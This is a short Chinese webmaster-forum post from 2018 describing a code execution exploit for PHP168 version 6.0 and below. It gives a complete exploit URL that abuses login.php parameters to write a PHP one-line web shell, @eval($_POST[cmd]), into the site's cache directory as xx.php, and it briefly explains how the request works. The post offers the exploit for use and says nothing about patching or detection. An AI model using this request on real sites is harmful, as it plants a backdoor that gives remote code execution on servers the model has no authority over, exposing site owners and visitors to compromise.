推56论坛

 找回密码
 立即注册(限中文)

QQ登录

只需一步,快速开始

查看: 1641|回复: 0

[php168教程] PHP168 6.0及以下版本login.php代码执行

  [复制链接]
发表于 2018-8-30 14:46:35 | 显示全部楼层 |阅读模式
在其域名后加上这样一段代码:
login.php?makehtml=1&chdb[htmlname]=xx.php& chdb[path]=cache&content=<?php%20@eval($_POST[cmd]);?>。
这段代码 的意思利用login.php文件将
<?php%20@eval($_POST[cmd]);?>
这段代码写入到网站缓存目录 cache的xx.php文件中。“<?php%20@eval($_POST[cmd]);?>”就是一句话木马的服务端。


URL是
http://www.xx.com/login.php?makehtml=1&chdb[htmlname]=xx.php&chdb[path]=cache&content=<?php%20@eval($_POST[cmd]);?>

本版积分规则

关闭

推56站长论坛推荐上一条 /1 下一条

站长QQ
在线咨询
咨询热线
QQ:405327411
站长

QQ|关于我们|联系我们|免责声明|网站导航|站长论坛 ( 豫ICP备11018337号-5 )

王宝臣旗下网站 推56论坛(www.tui56.com)站长论坛 SEO论坛 网络营销论坛 新手站长论坛 网络推广论坛 站长社区 站长网

Powered by Discuz! X3.4 Licensed

©2001-2013 Comsenz Inc.

快速回复 返回顶部 返回列表